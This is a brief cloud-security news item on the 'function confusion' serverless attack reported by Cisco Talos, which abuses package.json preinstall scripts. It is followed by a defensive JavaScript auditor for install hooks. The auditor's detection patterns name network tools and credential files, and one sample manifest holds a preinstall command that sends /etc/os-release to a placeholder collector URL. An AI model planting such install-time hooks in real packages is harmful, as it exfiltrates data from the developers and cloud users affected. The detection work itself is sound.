A newly identified cloud-based threat dubbed “function confusion” allows attackers to exploit serverless computing platforms like Google Cloud Platform, AWS Lambda, and Azure Functions by embedding malicious code in package installation scripts, Cyber Security News reports. Security analysts at Cisco Talos discovered that the vulnerability enables the execution of unauthorized commands through manipulated Node.js “package.json” files, specifically the “preinstall” script section. These scripts run automatically during cloud function deployments, enabling the collection of sensitive information such as OS details, user data, and network configurations, often undetected by traditional defenses. Attackers used packages like “myconfusedfunctionpoctestpackage” to access and exfiltrate data from files like “/etc/passwd” and “/etc/os-release.” The technique bypasses conventional security controls and highlights a broader systemic risk in how cloud platforms handle dependencies. To counter this stealthy and portable method of cloud exploitation, Cisco Talos recommends tightening oversight of third-party packages, limiting outbound network access during deployments, and improving logging.
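One way to act on the "oversight of third-party packages" recommendation is a pre-deployment gate that reports every dependency manifest declaring an install-time script. The following is an added example, not code from Cisco Talos or the report; the indicator patterns, package names, allowlist and collector URL are assumptions constructed for illustration.

```javascript
// Install-time hooks that npm runs automatically for a dependency.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic indicators (assumed for this example) of data collection or egress.
const INDICATORS = [
  ["network-egress", /\b(curl|wget|nc|ncat|nslookup|dig)\b|https?:\/\//i],
  ["sensitive-file", /\/etc\/(passwd|shadow|os-release)|\.ssh\/|\.aws\/|\.npmrc/i],
  ["inline-eval", /\b(node\s+-e|python3?\s+-c|(ba)?sh\s+-c|eval)\b|base64/i],
];

// manifests: [{ path, text }] where text is the raw package.json content.
// allowlist: Set of package names reviewed and permitted to run install hooks.
function auditManifests(manifests, allowlist = new Set()) {
  const findings = [];
  for (const { path, text } of manifests) {
    let pkg;
    try {
      pkg = JSON.parse(text);
    } catch {
      // An unparseable manifest cannot be cleared, so fail closed and report it.
      findings.push({ path, name: null, hook: null, command: null, reasons: ["unparseable-manifest"] });
      continue;
    }
    const scripts = pkg && typeof pkg.scripts === "object" && pkg.scripts !== null ? pkg.scripts : {};
    for (const hook of INSTALL_HOOKS) {
      const command = scripts[hook];
      if (typeof command !== "string" || allowlist.has(pkg.name)) continue;
      const reasons = INDICATORS.filter(([, re]) => re.test(command)).map(([tag]) => tag);
      findings.push({ path, name: pkg.name ?? null, hook, command, reasons });
    }
  }
  return findings;
}

// Constructed sample manifests (hypothetical packages, not taken from the report).
const SAMPLE = [
  { path: "node_modules/example-logger/package.json",
    text: JSON.stringify({ name: "example-logger", scripts: { test: "node test.js" } }) },
  { path: "node_modules/example-internal-utils/package.json",
    text: JSON.stringify({ name: "example-internal-utils", scripts: {
      preinstall: "node ./scripts/setup.js --read /etc/os-release --report https://collector.example.invalid/" } }) },
  { path: "node_modules/example-native/package.json",
    text: JSON.stringify({ name: "example-native", scripts: { install: "node-gyp rebuild" } }) },
  { path: "node_modules/example-broken/package.json", text: "{ not json" },
];

function sampleReport() {
  return auditManifests(SAMPLE, new Set(["example-native"]));
}
```

Any finding, even one with no matched indicator, is a package that will run code during deployment and should be reviewed or allowlisted before the build proceeds.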
Cloud Security
New cloud attack targets serverless platforms
